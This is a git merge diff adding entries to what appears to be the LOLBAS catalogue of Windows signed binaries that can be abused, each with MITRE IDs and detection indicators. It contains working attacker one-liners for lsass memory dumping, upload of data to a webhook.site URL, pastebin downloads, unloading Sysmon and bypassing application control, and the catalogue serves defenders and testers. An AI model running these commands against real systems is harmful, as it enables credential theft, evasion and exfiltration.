Merge branch 'master' into fixing-yaml-issues

This commit is contained in:
Oddvar Moe 2021-10-22 14:53:09 +02:00 committed by GitHub
commit a55e2249c1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
26 changed files with 535 additions and 9 deletions

View File

@ -0,0 +1,18 @@
---
Name: Update.exe
Description: Binary to update the existing installed Nuget/squirrel package. Part of Whatsapp installation.
Author: 'Jesus Galvez'
Created: '2020-11-01'
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
Description: Copy your payload into "%localappdata%\Whatsapp\app-[version]\". Then run the command. Update.exe will execute the file you copied.
Usecase: Execute binary
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 7 and up with Whatsapp installed
Full_Path:
- Path: '%localappdata%\Whatsapp\Update.exe'
Detection:
- IOC: "%localappdata%\Whatsapp\Update.exe" spawned an unknown process
---

View File

@ -0,0 +1,22 @@
---
Name: AppInstaller.exe
Description: Tool used for installation of AppX/MSIX applications on Windows 10
Author: 'Wade Hickey'
Created: '2020-12-02'
Commands:
- Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw
Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY>
Usecase: Download file from Internet
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows 10
Full_Path:
- Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe
Resources:
- Link: https://twitter.com/notwhickey/status/1333900137232523264
Acknowledgement:
- Person: Wade Hickey
Handle: '@notwhickey'
---

View File

@ -0,0 +1,28 @@
---
Name: Aspnet_Compiler.exe
Description: ASP.NET Compilation Tool
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u
Description: Execute C# code with the Build Provider and proper folder structure in place.
Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 10
Full_Path:
- Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
- Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
Code_Sample:
- Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder
Detection:
- IOC: Sysmon Event ID 1 - Process Creation
Resources:
- Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/
- Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8
Acknowledgement:
- Person: cpl
Handle: '@cpl3h'
---

View File

@ -1,6 +1,6 @@
---
Name: Certutil.exe
Description: Windows binary used for handeling certificates
Description: Windows binary used for handling certificates
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:

View File

@ -4,7 +4,7 @@ Description: The command-line interpreter in Windows
Author: 'Ye Yint Min Thu Htut'
Created: 2019-06-26
Commands:
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
Description: Add content to an Alternate Data Stream (ADS).
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
Category: ADS

View File

@ -0,0 +1,30 @@
---
Name: DataSvcUtil.exe
Description: DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application.
Author: 'Ialle Teixeira'
Created: '01/12/2020'
Commands:
- Command: DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile
Description: Upload file, credentials or data exfiltration in general
Usecase: Upload file
Category: Upload
Privileges: User
MitreID: T1567
MitreLink: https://attack.mitre.org/techniques/T1567/
OperatingSystem: Windows 10
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe
Code_Sample:
- Code: https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6
Detection:
- IOC: The DataSvcUtil.exe tool is installed in the .NET Framework directory.
- IOC: Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS.
- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil.
Resources:
- Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe
- Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services
- Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services
Acknowledgement:
- Person: Ialle Teixeira
Handle: '@NtSetDefault'
---

View File

@ -0,0 +1,30 @@
---
Name: Dllhost.exe
Description: Used by Windows to DLL Surrogate COM Objects
Author: 'Nasreddine Bencherchali'
Created: '2020-11-07'
Commands:
- Command: dllhost.exe /Processid:{CLSID}
Description: Use dllhost.exe to load a registered or hijacked COM Server payload.
Usecase: Execute a DLL Surrogate COM Object.
Category: Execute
Privileges: User
MitreID: T1546.015
MitreLink: https://attack.mitre.org/techniques/T1546/015/
OperatingSystem: Windows 10 (and likely previous versions)
Full_Path:
- Path: C:\Windows\System32\dllhost.exe
- Path: C:\Windows\SysWOW64\dllhost.exe
Code_Sample:
- Code:
Detection:
- IOC:
Resources:
- Link: https://twitter.com/CyberRaiju/status/1167415118847598594
- Link: https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08
Acknowledgement:
- Person: Jai Minton
Handle: '@CyberRaiju'
- Person: Nasreddine Bencherchali
Handle: '@nas_bench'
---

View File

@ -42,7 +42,7 @@ Full_Path:
Code_Sample:
- Code:
Detection:
- IOC: finstr.exe should normally not be invoked on a client system
- IOC: findstr.exe should normally not be invoked on a client system
Resources:
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

View File

@ -0,0 +1,22 @@
---
Name: IMEWDBLD.exe
Description: Microsoft IME Open Extended Dictionary Module
Author: 'Wade Hickey'
Created: '2020-03-05'
Commands:
- Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw
Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>
Usecase: Download file from Internet
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows 10
Full_Path:
- Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe
Resources:
- Link: https://twitter.com/notwhickey/status/1367493406835040265
Acknowledgement:
- Person: Wade Hickey
Handle: '@notwhickey'
---

View File

@ -20,6 +20,14 @@ Commands:
MitreID: T1127
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: msbuild.exe project.proj
Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+.
Usecase: Execute project file that contains XslTransformation tag parameters
Category: Execute
Privileges: User
MitreID: T1127
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
@ -27,8 +35,9 @@ Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
Code_Sample:
- Code:
- Path: C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe
Code_Sample:
- Code:
Detection:
- IOC: Msbuild.exe should not normally be executed on workstations
Resources:
@ -36,9 +45,12 @@ Resources:
- Link: https://github.com/Cn33liz/MSBuildShell
- Link: https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
- Link: https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
- Person: Cn33liz
Handle: '@Cneelis'
---
- Person: Jimmy
Handle: '@bohops'
---

View File

@ -0,0 +1,23 @@
---
Name: Pnputil.exe
Description: used for Install drivers.
Author: Hai vaknin (lux)
Created: 25/12/2020
Commands:
- Command: pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf
Description: used for Install drivers
Usecase: add malicious driver.
Category: Execute
Privileges: Administrator
MitreID: T1215
MitreLink: https://attack.mitre.org/techniques/T1215
OperatingSystem: Windows 10,7
Full_Path:
- Path: C:\Windows\system32\pnputil.exe
Code_Sample: https://github.com/LuxNoBulIshit/test.inf/blob/main/inf
Acknowledgement:
- Person: Hai Vaknin(Lux)
Handle: 'LuxNoBulIshit'
- Person: Avihay eldad
Handle: 'aloneliassaf'
---

View File

@ -11,7 +11,7 @@ Commands:
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607
Full_Path:
- Path: C:\Windows\System32\SyncAppvPublishingServer.exe
- Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe

View File

@ -19,6 +19,7 @@ Code_Sample:
Detection:
- IOC: wsreset.exe launching child process other than mmc.exe
- IOC: Creation or modification of the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command
- IOC: Microsoft Defender Antivirus as Behavior:Win32/UACBypassExp.T!gen
Resources:
- Link: https://www.activecyber.us/activelabs/windows-uac-bypass
- Link: https://twitter.com/ihack4falafel/status/1106644790114947073

26
yml/OSBinaries/fltMC.yml Normal file
View File

@ -0,0 +1,26 @@
---
Name: fltMC.exe
Description: Filter Manager Control Program used by Windows
Author: 'John Lambert'
Created: '2021-09-18'
Commands:
- Command: fltMC.exe unload SysmonDrv
Description: Unloads a driver used by security agents
Usecase: Defense evasion
Category: ADS
Privileges: Admin
MitreID: T1562
MitreLink: https://attack.mitre.org/techniques/T1562/002/
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path:
- Path: C:\Windows\System32\fltMC.exe
Code_Sample:
- Code:
Detection:
- IOC: 4688 events with fltMC.exe
Resources:
- Link: https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon
Acknowledgement:
- Person: Carlos Perez
Handle: '@Carlos_Perez'
---

View File

@ -0,0 +1,26 @@
---
Name: CL_LoadAssembly.ps1
Description: PowerShell Diagnostic Script
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: '”powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()'
Description: Proxy execute Managed DLL with PowerShell
Usecase: Execute proxied payload with Microsoft signed binary
Category: Execute
Privileges: User
MitreID: T1059.001
MitreLink: https://attack.mitre.org/techniques/T1059/001/
OperatingSystem: Windows 10 21H1 (likely other versions as well)
Full_Path:
- Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1
Code_Sample:
- Code:
Detection:
- IOC:
Resources:
- Link: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/
Acknowledgement:
- Person: Jimmy
Handle: '@bohops'
---

View File

@ -0,0 +1,26 @@
---
Name: UtilityFunctions.ps1
Description: PowerShell Diagnostic Script
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: 'powershell.exe -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()”'
Description: Proxy execute Managed DLL with PowerShell
Usecase: Execute proxied payload with Microsoft signed binary
Category: Execute
Privileges: User
MitreID: T1059.001
MitreLink: https://attack.mitre.org/techniques/T1059/001/
OperatingSystem: Windows 10 21H1 (likely other versions as well)
Full_Path:
- Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1
Code_Sample:
- Code:
Detection:
- IOC:
Resources:
- Link: https://twitter.com/nickvangilder/status/1441003666274668546
Acknowledgement:
- Person: Nick VanGilder
Handle: '@nickvangilder'
---

View File

@ -0,0 +1,27 @@
---
Name: adplus.exe
Description: Debugging tool included with Windows Debugging Tools
Author: mr.d0x
Created: 1/9/2021
Commands:
- Command: adplus.exe -hang -pn lsass.exe -o c:\users\mr.d0x\output\folder -quiet
Description: Creates a memory dump of the lsass process
Usecase: Create memory dump and parse it offline
Category: Dump
Privileges: SYSTEM
MitreID: T1003
MitreLink: https://attack.mitre.org/techniques/T1003/
OperatingSystem: All Windows
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe
Code_Sample:
- Code:
Detection:
- IOC:
Resources:
- Link: https://blog.thecybersecuritytutor.com/adplus-debugging-tool-lsass-dump/
Acknowledgement:
- Person: mr.d0x
Handle: '@mrd0x'
---

View File

@ -12,6 +12,16 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows
- Command: |
cdb.exe -pd -pn <process_name>
.shell <cmd>
Description: Attaching to any process and executing shell commands
Usecase: Run a shell command under a trusted Microsoft signed binary
Category: Execute
Privileges: User
MitreID:
MitreLink:
OperatingSystem: Windows
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe
@ -23,7 +33,12 @@ Resources:
- Link: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
- Link: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
- Link: https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda
Acknowledgement:
- Link: https://blog.thecybersecuritytutor.com/the-power-of-cdb-debugging-tool/
Acknoledgement:
- Person: Matt Graeber
Handle: '@mattifestation'
---
- Person: mr.d0x
Handle: '@mrd0x'
- Person: Spooky Sec
Handle: '@sec_spooky'
---

View File

@ -0,0 +1,38 @@
---
Name: Fsi.exe
Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK.
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: fsi.exe c:\path\to\test.fsscript
Description: Execute F# code via script file
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass
Privileges: User
MitreID: T1059
MitreLink: https://attack.mitre.org/techniques/T1059/
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
- Command: fsi.exe
Description: Execute F# code via interactive command line
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass
Privileges: User
MitreID: T1059
MitreLink: https://attack.mitre.org/techniques/T1059/
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Full_Path:
- Path: C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe
- Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe
Code_Sample:
- Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1
Detection:
- IOC: Sysmon Event ID 1 - Process Creation
Resources:
- Link: https://twitter.com/NickTyrer/status/904273264385589248
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Acknowledgement:
- Person: Nick Tyrer
Handle: '@NickTyrer'
- Person: Jimmy
Handle: '@bohops'
---

View File

@ -0,0 +1,36 @@
---
Name: FsiAnyCpu.exe
Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio.
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: fsianycpu.exe c:\path\to\test.fsscript
Description: Execute F# code via script file
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass
Privileges: User
MitreID: T1059
MitreLink: https://attack.mitre.org/techniques/T1059/
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
- Command: fsianycpu.exe
Description: Execute F# code via interactive command line
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass
Privileges: User
MitreID: T1059
MitreLink: https://attack.mitre.org/techniques/T1059/
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Full_Path:
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe
Code_Sample:
- Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1
Detection:
- IOC: Sysmon Event ID 1 - Process Creation
Resources:
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Acknowledgement:
- Person: Nick Tyrer
Handle: '@NickTyrer'
- Person: Jimmy
Handle: '@bohops'
---

View File

@ -0,0 +1,43 @@
---
Name: Remote.exe
Description: Debugging tool included with Windows Debugging Tools
Author: mr.d0x
Created: 1/6/2021
Commands:
- Command: Remote.exe /s "powershell.exe" anythinghere
Description: Spawns powershell as a child process of remote.exe
Usecase: Executes a process under a trusted Microsoft signed binary
Category: AWL Bypass
Privileges: User
MitreID:
MitreLink:
OperatingSystem:
- Command: Remote.exe /s "powershell.exe" anythinghere
Description: Spawns powershell as a child process of remote.exe
Usecase: Executes a process under a trusted Microsoft signed binary
Category: Execute
Privileges: User
MitreID:
MitreLink:
OperatingSystem:
- Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere
Description: Run a remote file
Usecase: Executing a remote binary without saving file to disk
Category: Execute
Privileges: User
MitreID:
MitreLink:
OperatingSystem:
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe
Code_Sample:
- Code:
Detection:
- IOC: remote.exe spawned
Resources:
- Link: https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/
Acknowledgement:
- Person: mr.d0x
Handle: '@mrd0x'
---

View File

@ -92,6 +92,22 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --createShortcut=payload.exe -l=Startup
Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.
Usecase: Execute binary
Category: Execute
Privileges: User
MitreID: T1547
MitreLink: https://attack.mitre.org/techniques/T1547/001/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --removeShortcut=payload.exe -l=Startup
Description: Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page.
Usecase: Execute binary
Category: Execute
Privileges: User
MitreID: T1070
MitreLink: https://attack.mitre.org/techniques/T1070/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Full_Path:
- Path: '%localappdata%\Microsoft\Teams\update.exe'
Code_Sample:
@ -114,4 +130,5 @@ Acknowledgement:
Handle: '@MrUn1k0d3r'
- Person: Adam
Handle: '@Hexacorn'
- Person: Jesus Galvez
---

View File

@ -0,0 +1,26 @@
---
Name: VSIISExeLauncher.exe
Description: Binary will execute specified binary. Part of VS/VScode installation.
Author: 'timwhite'
Created: '2021-09-24'
Commands:
- Command: VSIISExeLauncher.exe -p [PATH_TO_BIN] -a "argument here"
Description: The above binary will execute other binary.
Usecase: Execute any binary with given arguments.
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 10 and up with VS/VScode installed
Full_Path:
- Path: 'C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\Web Tools\ProjectSystem\VSIISExeLauncher.exe'
Code_Sample:
- Code:
Detection:
- IOC: VSIISExeLauncher.exe spawned an unknown process
Resources:
- Link: https://github.com/timwhitez
Acknowledgement:
- Person: timwhite
Handle:
---

View File

@ -0,0 +1,31 @@
---
Name: VisualUiaVerifyNative.exe
Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls.
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: VisualUiaVerifyNative.exe
Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing.
Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Full_Path:
- Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe
- Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe
- Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe
Code_Sample:
- Code:
Detection:
- IOC: Sysmon Event ID 1 - Process Creation
Resources:
- Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/
- Link: https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad
Acknowledgement:
- Person: Lee Christensen
Handle: '@tifkin'
- Person: Jimmy
Handle: '@bohops'
---

View File

@ -0,0 +1,28 @@
---
Name: Wfc.exe
Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK).
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: wfc.exe c:\path\to\test.xoml
Description: Execute arbitrary C# code embedded in a XOML file.
Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Full_Path:
- Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe
Code_Sample:
- Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Detection:
- IOC: Sysmon Event ID 1 - Process Creation
Resources:
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Acknowledgement:
- Person: Matt Graeber
Handle: '@mattifestation'
- Person: Jimmy
Handle: '@bohops'
---

View File

@ -13,6 +13,7 @@ Commands:
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows
Full_Path:
- Path: C:\Program Files\Microsoft Office\root\Office16\winword.exe
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\winword.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office16\winword.exe